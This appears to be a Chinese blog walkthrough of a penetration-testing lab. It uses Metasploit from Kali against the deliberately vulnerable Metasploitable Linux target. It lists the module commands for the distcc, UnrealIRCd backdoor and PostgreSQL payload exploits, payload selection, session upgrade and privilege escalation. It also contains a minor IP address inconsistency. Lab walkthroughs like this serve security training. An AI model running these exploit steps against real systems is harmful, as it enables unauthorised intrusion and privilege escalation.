MSF模拟渗透测试攻击linux实例

MSF模拟渗透测试攻击linux实例

文章目录

  • MSF模拟渗透测试攻击linux实例
  • 前言
  • 一、靶机metasploitable的使用
  • 二、利用kali攻击linux获得会话进行提权
    • 1.利用MSF本身存在的后门漏洞进行攻击
    • 2.使用攻击模块,进入会话,提权成功
  • 总结

前言

一、靶机metasploitable的使用

靶机MSF是一个linux的靶机漏洞平台,自身存在着很多漏洞,可以进行利用,本次就进行kali对linux的一次渗透攻击。

二、利用kali攻击linux获得会话进行提权

1.利用MSF本身存在的后门漏洞进行攻击

(1)首先下载好靶机MSF,打开kali,使用弱口令或者在百度上查询MSF的默认登录密码进行破解密码。
主机:kali
目标主机:MSF(linux)
MSF模拟渗透测试攻击linux实例_第1张图片
登录成功后,输入ifconfig,出现ip地址192.18.222.1
(2)登录kali的MSF
使用靶机存在的后门漏洞模块
search distcc
use exploit/unix/misc/distcc_exec
MSF模拟渗透测试攻击linux实例_第2张图片
(3)options查看参数
set rhosts 192.168.222.1
run后发现没有选择payload
MSF模拟渗透测试攻击linux实例_第3张图片
(4)选择payload
show payloads
set payload payload/cmd/unix/bind_perl
MSF模拟渗透测试攻击linux实例_第4张图片
发现distcc模块行不通,利用另一个模块(在百度上找的)
use exploit/unix/irc/unreal_ircd_3281_backdoor
MSF模拟渗透测试攻击linux实例_第5张图片
show payloads
set payload payload/cmd/unix/bind_perl
设置好payload后,设置ip地址
options
set rhosts 192.168.222.1
MSF模拟渗透测试攻击linux实例_第6张图片
(5)run,出现shell,background,输入y
输入sessions,查看会话信息
MSF模拟渗透测试攻击linux实例_第7张图片
sessions -u 3,使用会话
使用攻击模块
use exploit/linux/postgres/postgres_payload
options
MSF模拟渗透测试攻击linux实例_第8张图片
(6)设置ip地址,run
MSF模拟渗透测试攻击linux实例_第9张图片
提权成功,成功进入会话。

2.使用攻击模块,进入会话,提权成功

查看id,端口信息
MSF模拟渗透测试攻击linux实例_第10张图片
进入会话,提权成功,实验结束。

总结

本次实验是MSF攻击linux的一次渗透测试实例,利用相对应的模块进行攻击提权利用,掌握攻击linux,提权模块的使用原理。

你可能感兴趣的:(MFS渗透测试,测试工具,运维开发)